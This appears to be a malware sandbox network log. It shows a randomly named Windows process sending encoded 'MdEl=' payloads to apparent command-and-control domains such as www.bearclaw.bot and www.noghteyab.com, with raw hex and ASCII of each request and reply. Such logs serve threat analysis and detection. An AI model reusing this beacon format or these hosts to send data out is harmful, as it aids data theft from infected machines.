MdEl=c+TIz73J0JxBHBf2hqdftO7xQp4w4JUvFCphr3SjK7c5Ofx4KqcdhAKpBDCFi5W/In8LdV1Dn2QDKewTyCpByeHvQ8eziYE/Czdy6dnfNz9rW8ArME5DrjFHSxJjr5wu3yXEivP8wB1yBXqxvkd6Uhufpfjt4d1QTZx0l4Xx7LFf3St5wLjAd1aw+EVdgUrBuAE+0EwjFjhaZcOtPD79iglkr4FdD/ssWCLN3/d+EBOm+OxW3AuwxJw2nuqVrobRqmZTaAgHSN3T8db1Bbwq/T51ODBoV9OQzsbuKUKVrheBEO0EmXJOMlhyyEFneIvYrpKYCAxa9BluGG1Gbvg23J8+atnK6AWHyuDBGGSyiTmhf3wCbREYxnEcDFBaCq4E1Q5sn5dQAhHku+u9G6hWSnUdGihBjxXjmdMLlN9FVp8UGks7IfRcOVC8TG4uc3R2AdiLD9q+oF65/++mSTDLiNIsLRhOQMpyhNqrkMCrSjsCMdGUTlx61V80i6JBfpJc2oKopQ/y3uio1eVG252g0BPX3zROgUmQpZPB3vDuZso8dvLjVkTxoA42HKCjIda99JvnioyR9VcYQam+YEiNc44+MzBqrDAbOKl16udvuUq3kb+UHVSrPH9pgdmAzagGP7WUnkhdYrJ9JsGuY2jSeQE0o7GvEHZnIsTXhZluY40MrH9ooMJuLV+LjTv7eX5KgxnGeM1U70F+6+MBG18iOOyIrPO4R7KNDiy6TEQArWuOsvyM5GoOFmRteVw3H18EUlGMy8cAcY0IWvsEs5t67Xp/pFbwzjF5qMj6QCIuHZvFQSFz6KcBSo5euDLnAKolh/wDxqvNMnNsyne0c0Uo1HhSXdoYP8w9KNsw17XJY3WZahHBJSiBVrA2SHwJeovnsJV/cu7Et4abz6/G+yvAbzjjgeNDzwn2H8sd+BRd3uGCDSJ6D0aZJGyjrI46ukNKkucSrTXZ36OE79PVD1h7//d1CnptsntlcjOTwpjx/rr28YA [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:51.977652073 CEST	456	OUT	GET /8td2/?MdEl=R87owMDlv/gPXB+jmY4JjL2CfI0KtI8HCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZhlr63e+mCtJkAAC9Y39qRPS5qcaVUFFhd2AY=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.atlpicsstudios.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:20:52.451750040 CEST	402	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Jul 2024 05:20:52 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 64 45 6c 3d 52 38 37 6f 77 4d 44 6c 76 2f 67 50 58 42 2b 6a 6d 59 34 4a 6a 4c 32 43 66 49 30 4b 74 49 38 48 43 69 70 37 67 77 69 45 4c 5a 74 6f 4b 35 77 6d 48 61 34 56 36 33 57 34 45 67 4c 38 6d 4e 48 6d 53 56 4e 68 59 67 46 74 75 30 63 5a 55 38 77 70 39 7a 5a 68 6c 72 36 33 65 2b 6d 43 74 4a 6b 41 41 43 39 59 33 39 71 52 50 53 35 71 63 61 56 55 46 46 68 64 32 41 59 3d 26 63 76 34 44 3d 42 76 30 78 53 48 38 38 69 54 46 34 38 7a 53 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MdEl=R87owMDlv/gPXB+jmY4JjL2CfI0KtI8HCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZhlr63e+mCtJkAAC9Y39qRPS5qcaVUFFhd2AY=&cv4D=Bv0xSH88iTF48zS0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:57.488540888 CEST	708	OUT	POST /euu6/ HTTP/1.1 Host: www.bearclaw.bot Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.bearclaw.bot Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.bearclaw.bot/euu6/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 66 77 6a 37 77 49 34 76 6a 44 46 59 43 73 59 6d 32 71 57 59 6c 4f 6a 4e 47 4b 67 66 71 76 4b 76 4d 66 72 41 64 74 6a 45 6a 64 44 74 7a 51 4b 4b 57 4f 47 50 31 32 75 31 6d 66 71 6f 4e 68 68 7a 6d 77 4b 71 76 55 31 50 6f 73 2b 36 62 6e 62 38 4b 51 33 50 47 44 68 4b 43 74 45 7a 31 43 77 51 51 51 62 54 49 4e 58 2f 62 45 50 61 53 5a 41 56 76 62 31 59 54 55 63 62 7a 6a 31 48 33 61 4a 47 4e 77 77 62 52 55 53 35 38 4e 42 4a 33 4c 66 41 62 57 77 4d 49 31 44 79 6f 42 79 57 30 77 4a 62 67 64 75 62 68 49 47 32 51 45 63 51 4d 73 62 54 6b 73 79 62 70 67 3d 3d Data Ascii: MdEl=FTDkRuuk2Ocrfwj7wI4vjDFYCsYm2qWYlOjNGKgfqvKvMfrAdtjEjdDtzQKKWOGP12u1mfqoNhhzmwKqvU1Pos+6bnb8KQ3PGDhKCtEz1CwQQQbTINX/bEPaSZAVvb1YTUcbzj1H3aJGNwwbRUS58NBJ3LfAbWwMI1DyoByW0wJbgdubhIG2QEcQMsbTksybpg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:00.035625935 CEST	728	OUT	POST /euu6/ HTTP/1.1 Host: www.bearclaw.bot Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.bearclaw.bot Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.bearclaw.bot/euu6/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 63 51 7a 37 79 76 4d 76 32 54 46 5a 65 38 59 6d 35 4b 57 63 6c 4f 76 4e 47 49 4d 50 71 63 2b 76 4d 37 6a 41 63 76 4c 45 69 64 44 74 72 67 4b 50 62 75 47 55 31 32 69 44 6d 65 57 6f 4e 68 64 7a 6d 77 36 71 76 48 64 49 70 38 2b 76 4f 33 62 2b 48 77 33 50 47 44 68 4b 43 74 51 5a 31 43 34 51 51 67 4c 54 4c 73 58 34 45 30 50 64 56 5a 41 56 72 62 31 45 54 55 64 2b 7a 69 34 67 33 63 46 47 4e 30 30 62 52 46 53 34 32 4e 42 50 35 72 65 41 4c 57 52 57 4a 30 4f 31 6d 67 33 34 39 69 63 6d 73 37 2f 42 77 35 6e 68 43 45 34 6a 52 72 53 6e 70 76 50 53 79 73 31 6d 4b 4e 55 48 55 49 68 45 6a 76 4f 47 62 7a 6e 6e 72 61 49 3d Data Ascii: MdEl=FTDkRuuk2OcrcQz7yvMv2TFZe8Ym5KWclOvNGIMPqc+vM7jAcvLEidDtrgKPbuGU12iDmeWoNhdzmw6qvHdIp8+vO3b+Hw3PGDhKCtQZ1C4QQgLTLsX4E0PdVZAVrb1ETUd+zi4g3cFGN00bRFS42NBP5reALWRWJ0O1mg349icms7/Bw5nhCE4jRrSnpvPSys1mKNUHUIhEjvOGbznnraI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:02.566993952 CEST	10810	OUT	POST /euu6/ HTTP/1.1 Host: www.bearclaw.bot Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.bearclaw.bot Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.bearclaw.bot/euu6/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 63 51 7a 37 79 76 4d 76 32 54 46 5a 65 38 59 6d 35 4b 57 63 6c 4f 76 4e 47 49 4d 50 71 63 6d 76 4d 4d 6a 41 64 49 2f 45 68 64 44 74 69 41 4b 4f 62 75 47 56 31 31 54 4b 6d 65 62 54 4e 6e 5a 7a 6e 52 61 71 37 69 70 49 6e 38 2b 76 4d 33 62 39 4b 51 33 67 47 41 49 43 43 74 41 5a 31 43 34 51 51 6a 6a 54 66 4e 58 34 43 30 50 61 53 5a 41 5a 76 62 31 34 54 55 45 44 7a 69 74 58 32 73 6c 47 4e 55 6b 62 58 7a 4f 34 72 64 42 4e 34 62 65 75 4c 57 63 49 4a 77 75 49 6d 67 43 6a 39 67 41 6d 6d 38 50 63 71 5a 58 37 41 48 51 6b 4e 71 6d 62 72 2f 2f 7a 2b 73 6b 65 61 76 77 64 49 73 6c 7a 70 2f 50 32 4f 79 37 4e 39 74 79 4f 4b 39 52 56 6a 47 49 77 53 55 48 37 41 48 34 78 4b 71 6f 49 44 54 48 33 41 68 4a 35 39 55 6b 39 4e 53 64 51 2b 68 78 2f 33 78 74 2b 6d 48 4d 42 63 78 31 32 2b 54 34 4a 67 66 4e 54 6e 6b 57 78 2b 4b 33 53 77 53 48 75 5a 6c 62 2f 30 54 46 62 75 52 5a 4f 7a 6a 6f 71 34 6c 69 68 46 38 2f 46 42 6d 4a 6b 65 69 48 31 65 51 72 50 63 51 4a 73 72 31 55 56 2b [TRUNCATED] Data Ascii: MdEl=FTDkRuuk2OcrcQz7yvMv2TFZe8Ym5KWclOvNGIMPqcmvMMjAdI/EhdDtiAKObuGV11TKmebTNnZznRaq7ipIn8+vM3b9KQ3gGAICCtAZ1C4QQjjTfNX4C0PaSZAZvb14TUEDzitX2slGNUkbXzO4rdBN4beuLWcIJwuImgCj9gAmm8PcqZX7AHQkNqmbr//z+skeavwdIslzp/P2Oy7N9tyOK9RVjGIwSUH7AH4xKqoIDTH3AhJ59Uk9NSdQ+hx/3xt+mHMBcx12+T4JgfNTnkWx+K3SwSHuZlb/0TFbuRZOzjoq4lihF8/FBmJkeiH1eQrPcQJsr1UV+gPh4fujS4mCybO9m96rq8HkYlGEvrzqVOAS/U3lXh9ekIArvtf5/oTVeufQA0gg39kBRguWR5RvopdbHTtvyq/CgxnIMlNqjO6KRy7YlaxkWKH0hna5ohmln94szvuW2xJ8EhX5BrEcn+rAjX2ZaFUDW/uWsy+8H6/cc3G6b/Aq2VIEeJ6dIj83Z+EVUIKpkH85BivomPhlHSFsU0ka48xdnpxZGwTz9pCMn9hY9tLcVGt2UoI0dBlKRk46/ljODj+0DGIGmmOt5Ygj15b8fQJxMc1SVHIcXhxkyAdsfhsHgph11v9I4fgNFlHObO7a5zHPKu8gX24mgK/E42O057XCugwMdBdsCz6juUPasmurVN3IgQZhh25nLb3mWRa48QFqCXwk3w187D9mKMEjOsD7wX38U9rXgct0L+cjft1FMVshKABQwfKCCAFFGt7vq3Te6fZ9iRm2Gybo7xOdUP/6EV8vRn3htJxd1Qf1cuA8FAf61aqVU7/9lH2HQvnBq00JsSTBQDlA8TjDBLaOlwWYWXPJy92ZpxA+FXUyrxHYk5Qbe0psLYsQ1x8dXJ2AK8namc+C7kCWvTzef2TXmo0+iMb4/mTWBFHUqF/kczZhzePTdd+IeXBxeSpcX+GPPC9BdMLYTYjTlWiREHYn9k8Cg9zWe+GvFwU [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:05.103705883 CEST	450	OUT	GET /euu6/?MdEl=IRrESbehp9A4c0aqntgU3lFYJOQbp6eRy9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRa4em8B2a8CWrKaBF9FfZt3ygodHmjWNP+HTQ=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.bearclaw.bot Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:21:05.558768034 CEST	402	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Jul 2024 05:21:05 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 64 45 6c 3d 49 52 72 45 53 62 65 68 70 39 41 34 63 30 61 71 6e 74 67 55 33 6c 46 59 4a 4f 51 62 70 36 65 52 79 39 2f 38 50 74 4d 55 6a 66 62 36 43 73 48 63 66 64 79 48 35 66 66 6a 72 69 44 56 51 64 37 53 74 47 2f 53 6f 70 6a 38 44 45 64 73 73 67 4f 6b 39 6a 52 61 34 65 6d 38 42 32 61 38 43 57 72 4b 61 42 46 39 46 66 5a 74 33 79 67 6f 64 48 6d 6a 57 4e 50 2b 48 54 51 3d 26 63 76 34 44 3d 42 76 30 78 53 48 38 38 69 54 46 34 38 7a 53 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MdEl=IRrESbehp9A4c0aqntgU3lFYJOQbp6eRy9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRa4em8B2a8CWrKaBF9FfZt3ygodHmjWNP+HTQ=&cv4D=Bv0xSH88iTF48zS0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	51.89.93.193	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:10.624149084 CEST	711	OUT	POST /wlsq/ HTTP/1.1 Host: www.noghteyab.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.noghteyab.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.noghteyab.com/wlsq/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 6f 6d 50 41 2f 63 48 6b 53 45 76 52 66 6f 59 44 4d 6e 6c 43 66 43 58 46 79 72 51 77 74 76 56 6b 2f 63 4c 76 6d 54 70 74 5a 47 56 6c 61 39 77 78 71 78 41 55 4c 75 2f 78 6c 61 61 6d 76 64 57 4b 45 74 50 6b 52 6c 2f 55 2b 6d 46 69 65 35 7a 6e 43 44 69 4b 4a 71 4e 61 30 50 6f 6c 78 76 52 38 57 4b 6b 46 50 38 75 77 39 71 4f 48 43 2b 66 45 2f 32 43 75 4c 74 44 74 6d 38 77 39 65 77 72 77 54 79 75 4a 38 6e 48 42 6b 6d 56 56 76 47 74 48 59 4d 38 69 58 34 4b 39 66 74 70 6b 4b 2f 62 65 2b 59 77 53 4a 77 33 51 49 6f 52 77 53 72 6a 75 6f 45 54 30 6c 41 3d 3d Data Ascii: MdEl=wEVpZkHO0lSaomPA/cHkSEvRfoYDMnlCfCXFyrQwtvVk/cLvmTptZGVla9wxqxAULu/xlaamvdWKEtPkRl/U+mFie5znCDiKJqNa0PolxvR8WKkFP8uw9qOHC+fE/2CuLtDtm8w9ewrwTyuJ8nHBkmVVvGtHYM8iX4K9ftpkK/be+YwSJw3QIoRwSrjuoET0lA==
Jul 8, 2024 07:21:11.264492989 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 05:21:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1q1j4rptef8idm4pue3hjht8vq; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Encoding: gzip Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED] Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~uYYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-8u\X7HDx97lOxjX]=0LC}-5+Y;k3k-#\|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
Jul 8, 2024 07:21:11.264512062 CEST	506	IN	Data Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25 Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR\|E)77%esr]/W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	51.89.93.193	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:13.158796072 CEST	731	OUT	POST /wlsq/ HTTP/1.1 Host: www.noghteyab.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.noghteyab.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.noghteyab.com/wlsq/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 36 57 2f 41 76 50 66 6b 65 30 76 53 42 34 59 44 44 48 6b 46 66 43 54 46 79 71 6b 61 74 39 68 6b 2f 35 76 76 6c 53 70 74 4a 57 56 6c 56 64 77 2b 75 78 41 66 4c 75 7a 44 6c 61 6d 6d 76 5a 2b 4b 45 73 2f 6b 51 53 4c 58 2b 32 46 67 46 4a 7a 6c 64 54 69 4b 4a 71 4e 61 30 50 39 74 78 76 4a 38 4b 71 55 46 41 39 75 7a 68 61 4f 41 56 4f 66 45 31 57 43 71 4c 74 44 45 6d 2b 56 67 65 79 54 77 54 7a 65 4a 38 57 48 43 76 6d 56 4d 69 6d 73 6c 49 63 77 6d 65 39 37 71 51 75 6c 54 48 2b 62 34 37 65 68 49 59 42 57 48 61 6f 31 44 50 73 71 61 6c 48 75 39 2b 4a 6b 51 77 6b 75 34 6e 35 67 45 61 56 30 36 58 57 35 6a 37 66 6f 3d Data Ascii: MdEl=wEVpZkHO0lSa6W/AvPfke0vSB4YDDHkFfCTFyqkat9hk/5vvlSptJWVlVdw+uxAfLuzDlammvZ+KEs/kQSLX+2FgFJzldTiKJqNa0P9txvJ8KqUFA9uzhaOAVOfE1WCqLtDEm+VgeyTwTzeJ8WHCvmVMimslIcwme97qQulTH+b47ehIYBWHao1DPsqalHu9+JkQwku4n5gEaV06XW5j7fo=
Jul 8, 2024 07:21:13.808758020 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 05:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k81levme72n3afdklccb08vrf7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Encoding: gzip Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED] Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~uYYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-8u\X7HDx97lOxjX]=0LC}-5+Y;k3k-#\|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
Jul 8, 2024 07:21:13.808784962 CEST	506	IN	Data Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25 Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR\|E)77%esr]/W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	51.89.93.193	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:15.691659927 CEST	10813	OUT	POST /wlsq/ HTTP/1.1 Host: www.noghteyab.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.noghteyab.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.noghteyab.com/wlsq/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 36 57 2f 41 76 50 66 6b 65 30 76 53 42 34 59 44 44 48 6b 46 66 43 54 46 79 71 6b 61 74 39 5a 6b 38 50 7a 76 6c 78 42 74 4b 57 56 6c 63 39 77 39 75 78 41 43 4c 75 72 48 6c 61 72 54 76 62 32 4b 46 4f 33 6b 58 6e 6e 58 30 32 46 67 61 35 7a 6b 43 44 6a 49 4a 71 63 54 30 50 74 74 78 76 4a 38 4b 6f 4d 46 4a 4d 75 7a 6a 61 4f 48 43 2b 66 79 2f 32 43 53 4c 74 62 2b 6d 2b 42 77 65 44 7a 77 53 54 4f 4a 73 77 7a 43 77 57 56 4f 78 57 73 44 49 63 39 34 65 38 54 6d 51 74 34 45 48 2b 76 34 37 35 55 4e 46 53 79 41 50 72 45 66 4d 38 43 4c 38 6b 2f 34 34 72 64 71 2f 78 4b 2f 